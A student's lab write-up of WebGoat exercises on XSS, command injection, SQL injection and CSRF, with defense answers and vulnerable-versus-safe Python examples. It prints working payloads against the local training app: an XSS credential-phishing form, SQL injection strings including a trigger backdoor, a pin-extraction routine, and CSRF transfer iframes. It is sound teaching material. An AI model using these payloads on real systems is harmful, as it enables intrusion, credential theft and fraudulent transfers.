20155227 "Cyber Confrontation" EXP9 Web Security Foundation Practice

Source: Internet
Author: User
Tags: sql injection, sql injection attack, csrf attack

Experiment Content
    • About Webgoat
    • Cross-site Scripting (XSS) Exercise
    • Injection flaws Practice
    • CSRF attack
Basic Question Answers
    • SQL injection attack principle, how to defend?
Principle: a SQL injection attack passes specially constructed input to the web application as a parameter. The input is mostly fragments of SQL syntax, so when the application executes the resulting SQL statement it performs whatever operation the attacker wants, and illegitimate data or queries enter the system.
Defense: 1. Validate user input, for example with regular expressions, and escape or reject special sequences such as the double dash `--`. 2. Do not build SQL by dynamic string concatenation; use parameterized SQL (bound parameters) or stored procedures for data access. 3. Do not connect to the database with administrator privileges; give each application its own connection with limited rights. 4. Do not store secrets in the clear; encrypt or hash passwords and other sensitive information. 5. Application error messages should reveal as little as possible. 6. Use auxiliary software or a web platform (WAF, scanner) to detect SQL injection. Of these, item 2 is the control that actually prevents injection; the others reduce the damage when an injection does get through.
    • What is the principle of XSS attack and how to defend it?
Principle: XSS is a computer security vulnerability that frequently appears in web applications. It allows a malicious web user to plant code (such as HTML and client-side script) into pages served to other users; an attacker can use an XSS vulnerability to bypass access controls, since the injected script runs in the victim's browser with the victim's session.

Defense:

1. Signature matching: check every submitted value, typically searching for the keyword "javascript"; if it is found, treat the submission as an XSS attack. 2. Perform reliable input validation on everything users submit, including URLs, query keywords, HTTP headers and POST data; accept only content within the specified length, in the expected format and using the expected characters, and filter everything else. 3. Implement session tokens, a CAPTCHA system or HTTP Referer checks to prevent functionality from being executed by a third-party site.
Note that keyword matching (item 1) is easily bypassed with event handlers such as `onerror`, case variants and encoding, and item 3 is really a CSRF countermeasure; the control that actually stops XSS is context-aware output encoding of untrusted data at the point where it is written into the page.
    • CSRF attack principle, how to defend?
Principle: CSRF, cross-site request forgery, also known as "one-click attack" or "session riding" and usually abbreviated CSRF or XSRF, is a malicious exploitation of a website in which requests are disguised as coming from a trusted user in order to abuse the site that trusts that user. It is a confused-deputy attack that relies on the web browser, which attaches the user's cookies to requests regardless of which page initiated them.
Defense: 1. Include a secret, user-specific token in the form as verification beyond the cookie. 2. "Double submit" cookie: an authorization cookie is read by JavaScript before the form is posted, so the same-origin restriction applies; if the server requires the POST body or URL to carry the value of that cookie, the request must have come from the trusted domain. 3. Log out of a site before browsing other sites, or clear the browser's cookies at the end of the browser session.
Experimental Process Records
1. WebGoat
    • To start WebGoat, first download the Java package, then run: java -jar webgoat-container-7.0.1-war-exec.jar

    • Open localhost:8080/WebGoat in the browser and log in.

2. XSS Attack
(1) Phishing with XSS
    • In this lesson we enter the XSS attack code in the search box. The leading </form> closes the page's own search form so that the injected login form stands on its own; the hack() function sends the captured credentials to WebGoat's catcher endpoint:
</form>
<script>
function hack(){
  XSSImage=new Image;
  XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
  alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
}
</script>
<form name="phish">
<br><br><HR>
<H2>This feature requires account login:</H2><br><br>
Enter Username:<br><input type="text" name="user"><br>
Enter Password:<br><input type="password" name="pass"><br>
<input type="submit" name="login" value="login" onclick="hack()">
</form><br><br><HR>
    • After entering the attack code in the search box and clicking Search, a form asking for a username and password appears. Enter a username and password and click login; WebGoat captures the values and feeds back what was entered:

(2) Reflected XSS Attacks

In the input box, enter <script>alert("I am 20155227gyl");</script>; the script is echoed back in the response and executes.

(3) Stored XSS Attacks
    • Requirement: create malicious message content that causes other users to load unexpected pages or content when they view it.
    • Enter any title, then enter a piece of code as the message, for example <script>alert("5227!");</script>. After submitting, click the post just created; the pop-up window appears, indicating the attack succeeded.

3. Injection Flaws
(1) Command Injection
    • The lesson requires executing system commands on the target host. I found that the page source can be edited with the Firefox extension Firebug: in the option value next to BackDoors.help, append & netstat -an & ipconfig

    • Select the modified value and click View; the injected commands run and the system's network connections are displayed:
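The lesson works because the server pastes the selected file name into a shell command line, and the shell treats `&`, `;` and `|` as command separators. The added example below (not WebGoat's code) reproduces that on POSIX with a constructed help directory and shows the fix: an allow-list for the file name and an argv list so that no shell parses the input. The `; echo INJECTED` payload is the POSIX equivalent of the write-up's `& netstat -an & ipconfig`.

```python
import os
import re
import subprocess
import tempfile

HELP_NAME = re.compile(r"[A-Za-z0-9_]+\.help")


def make_help_dir():
    """Constructed fixture: a directory holding BackDoors.help, standing in for the lesson's help files."""
    d = tempfile.mkdtemp()
    with open(os.path.join(d, "BackDoors.help"), "w") as f:
        f.write("Database backdoors lesson help\n")
    return d


def view_help_vulnerable(help_dir, help_file):
    """Builds a command string from the form value and hands it to a shell.
    Anything after a separator in help_file becomes a second command."""
    cmd = "cat " + os.path.join(help_dir, help_file)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def view_help_safe(help_dir, help_file):
    """Allow-list the name (letters, digits, underscore, .help suffix) and pass argv
    as a list: the file name is one argument, never parsed by a shell."""
    if not HELP_NAME.fullmatch(help_file):
        raise ValueError(f"invalid help file name: {help_file!r}")
    path = os.path.join(help_dir, help_file)
    return subprocess.run(["cat", path], capture_output=True, text=True, check=True).stdout
```

The allow-list also blocks path traversal such as `../../etc/passwd`, which the argv list alone would not.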

(2) Numeric SQL Injection
    • This form lets the user view weather data for one station; with SQL injection it becomes possible to view all of the data.
    • The station field is injected with characters that form a new SQL statement. The original query is SELECT * FROM weather_data WHERE station = [station], so appending or 1=1 to any station value (for example 101 or 1=1) makes the WHERE clause always true. Modify the option value, select a city, and the weather for every station is returned.

(3) Log Spoofing

In this lesson the user name we enter is appended to the log file, so we can craft a user name that makes the log show a "successful login" for admin. For example, enter gyl%0d%0aLogin Succeeded for username: admin in the User Name box, where %0d is a carriage return and %0a is a line feed; after URL decoding the log entry spans two lines:
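The added example below (not WebGoat's code) shows why the payload works and what the fix looks like: the server URL-decodes %0d%0a into CR LF, and a logger that writes the raw value produces two log lines from one request. Escaping line terminators before logging keeps one request on one line; the SIEM or auditor then sees the forged text inside the real entry instead of as a separate event.

```python
from urllib.parse import unquote


def log_login_vulnerable(log, username, success):
    """Appends the raw user name to the log, as the Log Spoofing lesson does."""
    status = "Login Succeeded" if success else "Login Failed"
    log.append(f"{status} for username: {username}")


def sanitize_for_log(value):
    """Neutralise CR and LF so one request can only ever produce one log line."""
    return value.replace("\r", "\\r").replace("\n", "\\n")


def log_login_safe(log, username, success):
    status = "Login Succeeded" if success else "Login Failed"
    log.append(f"{status} for username: {sanitize_for_log(username)}")


def demo(payload="gyl%0d%0aLogin Succeeded for username: admin"):
    """Returns (lines in the vulnerable log, lines in the safe log) for the lab's payload."""
    username = unquote(payload)  # the container decodes %0d%0a to "\r\n" before the app sees it
    vuln, safe = [], []
    log_login_vulnerable(vuln, username, success=False)
    log_login_safe(safe, username, success=False)
    return "\n".join(vuln).splitlines(), "\n".join(safe).splitlines()
```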

(4) Lab: SQL Injection, Stage 1: String SQL Injection
    • Task: use string SQL injection to log in as the boss without the correct password.
    • Enter ' or 1=1 -- in the password field: the login fails.
    • Inspect the source: the password input has a length limit (a client-side attribute, so not a real control). Remove it and the login succeeds.

Stage 3: Numeric SQL Injection
    • Requirement: by injecting statements, browse information that could not originally be viewed, i.e. as the ordinary employee Larry, view the boss's account information. First log in as Larry with the method from the previous stage, entering ' or 1=1 -- in the password box. After logging in we can only see Larry's own salary information.

    • The button for viewing employee information is ViewProfile. Analyzing the page code for this button, the employee ID is passed as the parameter. To let Larry reach the boss's account information, change the parameter value to 101 or 1=1 order by salary desc -- so that the boss's record, the one with the highest salary, is returned first:

(5) String SQL Injection
    • This form lets users look up their own credit card number; with SQL injection we can see all credit card numbers.
    • We construct an always-true condition so the WHERE clause matches regardless of the preceding comparison: the input ' or '1'='1 returns every credit card number.
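Stage 1 (' or 1=1 --) and the String SQL Injection lesson (' or '1'='1) are the same defect, and the fix is the one named in the basic question answers: bound parameters instead of string concatenation. The added example below (not WebGoat's code; the tables are a constructed stand-in for the lesson's data) runs both payloads against a concatenated query and against a parameterized one in SQLite.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the lesson's tables (not WebGoat's real schema or data)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE employee(userid INTEGER, first_name TEXT, password TEXT, salary INTEGER);
        INSERT INTO employee VALUES (101, 'Larry', 'larry', 55000);
        INSERT INTO employee VALUES (112, 'Neville', 'neville', 450000);
        CREATE TABLE user_data(userid INTEGER, last_name TEXT, cc_number TEXT);
        INSERT INTO user_data VALUES (101, 'Smith', '2234200065411');
        INSERT INTO user_data VALUES (102, 'Jones', '4352209902861');
        INSERT INTO user_data VALUES (103, 'Plane', '4352209902862');
    """)
    return con


def login_vulnerable(con, first_name, password):
    """Stage 1 style concatenation. The password  ' or 1=1 --  closes the literal,
    appends an always-true OR and comments out the closing quote."""
    sql = (f"SELECT userid, first_name FROM employee "
           f"WHERE first_name = '{first_name}' AND password = '{password}'")
    return con.execute(sql).fetchall()


def login_safe(con, first_name, password):
    """Bound parameters: values travel separately from the SQL text, so quotes
    and comment markers inside them are just characters of the value."""
    sql = "SELECT userid, first_name FROM employee WHERE first_name = ? AND password = ?"
    return con.execute(sql, (first_name, password)).fetchall()


def credit_cards_vulnerable(con, last_name):
    """String SQL Injection lesson:  ' or '1'='1  makes the WHERE clause always true."""
    sql = f"SELECT userid, last_name, cc_number FROM user_data WHERE last_name = '{last_name}'"
    return con.execute(sql).fetchall()


def credit_cards_safe(con, last_name):
    sql = "SELECT userid, last_name, cc_number FROM user_data WHERE last_name = ?"
    return con.execute(sql, (last_name,)).fetchall()
```

The maxlength attribute removed in Stage 1 illustrates the general point: anything enforced only in the browser is under the attacker's control, so server-side parameterization is the control that counts.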

(6) Blind Numeric SQL Injection
    • The task is to obtain the pin value stored in the pins table for the row with cc_number=1111222233334444; pin is an int.
      Intercept the request with BurpSuite, send it to Intruder (Action > Send to Intruder) and brute-force it in Sniper mode: clear the default payload positions, mark the injected number, and use a numeric payload from 1 to 10000 with step 1. One response has a length clearly different from all the others; it belongs to the payload 2364, so the pin is 2364:
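Brute-forcing 10000 requests works, but the same true/false oracle (the page only says whether the account number is valid) supports a binary search that recovers the pin in at most 14 requests. The added example below goes beyond the write-up in that respect; it is not WebGoat's code, and the tables are a constructed stand-in for the lesson's data, with the pin set to the value found above.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the lesson's tables (not WebGoat's real data)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE user_data(userid INTEGER, first_name TEXT);
        INSERT INTO user_data VALUES (101, 'Joe');
        CREATE TABLE pins(cc_number TEXT, pin INTEGER);
        INSERT INTO pins VALUES ('1111222233334444', 2364);
        INSERT INTO pins VALUES ('4321432143214321', 1234);
    """)
    return con


def account_valid_vulnerable(con, account_number):
    """The blind oracle: the page reveals only whether the account number is valid,
    but the value is interpolated, so an appended condition is evaluated with it."""
    sql = f"SELECT * FROM user_data WHERE userid = {account_number}"
    return len(con.execute(sql).fetchall()) > 0


def account_valid_safe(con, account_number):
    """int() rejects anything that is not a number and the query takes a bound parameter."""
    sql = "SELECT * FROM user_data WHERE userid = ?"
    return len(con.execute(sql, (int(account_number),)).fetchall()) > 0


def extract_pin(con, cc_number="1111222233334444", lo=0, hi=10000):
    """Binary search over the oracle: each request halves the candidate range.
    Returns (pin, number of requests used)."""
    queries = 0
    while lo < hi:
        mid = (lo + hi) // 2
        payload = f"101 AND (SELECT pin FROM pins WHERE cc_number = '{cc_number}') <= {mid}"
        queries += 1
        if account_valid_vulnerable(con, payload):
            hi = mid
        else:
            lo = mid + 1
    return lo, queries
```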

(7) Database Backdoors
    • Enter 101 to retrieve the user's information.

    • Observing that the input is not validated, enter 101; update employee set salary=10000 : the user's salary is changed to 10000 and the attack succeeds:

    • Then enter 101 or 1=1;CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='[email protected]' WHERE userid = NEW.userid
    • From then on, whenever a new user is added to the table, the trigger changes the new user's e-mail address to the one I set.
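The numeric injections (the weather station, Stage 3's ViewProfile) and the Database Backdoors lesson share one cause: a number is concatenated into the query, so it can carry an `or 1=1 ... order by`, or additional statements if the driver executes scripts. The added example below (not WebGoat's code; the employee table is a constructed stand-in) runs both payloads against SQLite and shows the fixes: an integer parameter, one statement per call, and an authorization check, since Stage 3 is also an access-control failure. The trigger uses an assumed attacker address, and AFTER INSERT rather than BEFORE, because in SQLite the new row does not exist yet when a BEFORE trigger runs.

```python
import sqlite3


def make_db():
    """Constructed employee table standing in for WebGoat's (not its real schema or data)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE employee(userid INTEGER PRIMARY KEY, name TEXT, email TEXT, salary INTEGER);
        INSERT INTO employee VALUES (101, 'Larry Stooge', 'larry@example.com', 55000);
        INSERT INTO employee VALUES (102, 'Moe Stooge', 'moe@example.com', 140000);
        INSERT INTO employee VALUES (112, 'Neville Bartholomew', 'neville@example.com', 450000);
    """)
    return con


def view_profile_vulnerable(con, employee_id):
    """Stage 3 / weather station: the id is concatenated, so
    '101 or 1=1 order by salary desc --' returns every row, highest salary first."""
    sql = f"SELECT userid, name, salary FROM employee WHERE userid = {employee_id}"
    return con.execute(sql).fetchall()


def view_profile_safe(con, employee_id, session_userid):
    """Two fixes: int() rejects anything that is not a number, and the caller may
    only read the record belonging to the logged-in session (authorization)."""
    eid = int(employee_id)
    if eid != session_userid:
        raise PermissionError("employees may only view their own profile")
    sql = "SELECT userid, name, salary FROM employee WHERE userid = ?"
    return con.execute(sql, (eid,)).fetchall()


# Assumed attacker address; SQLite needs AFTER INSERT for the UPDATE to hit the new row.
BACKDOOR_TRIGGER = ("CREATE TRIGGER myBackDoor AFTER INSERT ON employee FOR EACH ROW "
                    "BEGIN UPDATE employee SET email = 'attacker@example.com' "
                    "WHERE userid = NEW.userid; END")


def lookup_vulnerable(con, employee_id):
    """Database Backdoors: the driver runs a whole script, so
    '101; update employee set salary=10000' executes the UPDATE too."""
    con.executescript(f"SELECT * FROM employee WHERE userid = {employee_id}")


def lookup_safe(con, employee_id):
    """execute() runs exactly one statement and the id is a bound integer."""
    sql = "SELECT userid, name, email, salary FROM employee WHERE userid = ?"
    return con.execute(sql, (int(employee_id),)).fetchall()


def salary(con, userid):
    return con.execute("SELECT salary FROM employee WHERE userid = ?", (userid,)).fetchone()[0]


def email(con, userid):
    return con.execute("SELECT email FROM employee WHERE userid = ?", (userid,)).fetchone()[0]
```

Least privilege at the database layer matters here too: an application account without CREATE TRIGGER or UPDATE rights on the employee table could not plant this backdoor even with a working injection.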

4. CSRF Attack
(1) Cross Site Request Forgery
    • Requirement: write a URL that lures other users into clicking it and thereby triggers a CSRF attack. We can put the URL into the message box in the form of an image (an img tag whose src is the attack URL), so the URL is not visible to other users; as soon as a user's browser loads the image, the CSRF request fires.
    • Check the Screen and menu values for your own instance:

    • Then write a message whose image request is a funds transfer, which steals the money. After submitting, a new message appears in the message list; when it is clicked, the page loads and displays the message, the user's money is transferred, and the CSRF attack has achieved its purpose.

    • Submit the crafted message (titled 20155227):

    • Click to view the record of user actions:

(2) CSRF Prompt By-Pass
    • This is again a forged transfer via CSRF, but this time two requests are involved: the transfer request and the request that confirms the transfer, i.e. two extra parameters have to reach the server (transferFunds=4000, then transferFunds=CONFIRM).
    • Look at the src and menu values under Parameters on the right of the page, fill in the amount, and enter the following code in the message box (replace the placeholders with your own values):
<iframe src="attack?Screen=<src value>&menu=<menu value>&transferFunds=<amount>"> </iframe><iframe src="attack?Screen=<src value>&menu=<menu value>&transferFunds=CONFIRM"> </iframe>
    • The rest of the procedure is the same as in the previous lesson.

    • However, the green check mark on the left did not appear, so open the confirmation transfer request page directly in the browser: localhost:8080/WebGoat/attack?Screen=268&menu=900&transferFunds=5000

Click the CONFIRM button, then enter in the browser: localhost:8080/WebGoat/attack?Screen=266&menu=900&transferFunds=CONFIRM ; 5000 is transferred successfully:
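Both CSRF lessons, and the CSRF defense listed in the basic question answers, rest on the same fact: the transfer endpoint authenticates by session cookie alone, and the browser attaches that cookie to any img or iframe load, whichever page started it. The confirmation step does not help, because the attacker's page simply issues both requests. The added example below (a constructed toy bank, not WebGoat's code) contrasts that endpoint with one that requires a per-session synchronizer token, which a third-party page cannot read and therefore cannot supply.

```python
import hmac
import secrets


class Bank:
    """Constructed toy bank with two transfer endpoints: one trusting the cookie
    alone and one that also demands the session's CSRF token."""

    def __init__(self):
        self.balances = {"victim": 10000, "attacker": 0}
        self.sessions = {}  # session cookie -> (user, per-session CSRF token)

    def login(self, user):
        cookie = secrets.token_hex(16)
        self.sessions[cookie] = (user, secrets.token_hex(16))
        return cookie

    def csrf_token_for(self, cookie):
        """Embedded in the legitimate transfer form; cross-origin pages cannot read it."""
        return self.sessions[cookie][1]

    def _move(self, user, amount):
        if self.balances[user] < amount:
            raise ValueError("insufficient funds")
        self.balances[user] -= amount
        self.balances["attacker"] += amount

    def transfer_vulnerable(self, cookie, amount):
        """attack?...&transferFunds=N as the lesson has it: any request carrying a valid
        cookie is honoured. A second CONFIRM request is accepted the same way."""
        user, _ = self.sessions[cookie]
        self._move(user, amount)

    def transfer_safe(self, cookie, amount, token):
        """Synchronizer token: the request must carry the secret bound to the session.
        compare_digest keeps the comparison constant-time."""
        user, expected = self.sessions[cookie]
        if token is None or not hmac.compare_digest(token, expected):
            raise PermissionError("missing or invalid CSRF token")
        self._move(user, amount)


def forged_request_demo():
    """Simulates the victim's browser loading the attacker's iframes, then a real form post.
    Returns (final balances, whether the token check blocked the forged request)."""
    bank = Bank()
    cookie = bank.login("victim")               # victim is logged in to the bank
    bank.transfer_vulnerable(cookie, 5000)      # forged iframe request: succeeds
    try:
        bank.transfer_safe(cookie, 5000, token=None)  # forged request has no token
        blocked = False
    except PermissionError:
        blocked = True
    bank.transfer_safe(cookie, 1000, bank.csrf_token_for(cookie))  # legitimate form
    return bank.balances, blocked
```

Setting the session cookie with the SameSite attribute is a complementary browser-side control; it stops the cookie being attached to cross-site iframe and image loads in the first place, but a server-side token remains the authoritative check.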

Experimental Experience

This experiment was really difficult, mainly because the environment kept going wrong; after trying for a long time I decided to copy a virtual machine directly. After starting the experiment I found that the content was all in English, which was really discouraging ... But through the WebGoat practice I learned some small routines of SQL injection attacks, XSS attacks and CSRF attacks, which was a small harvest too.

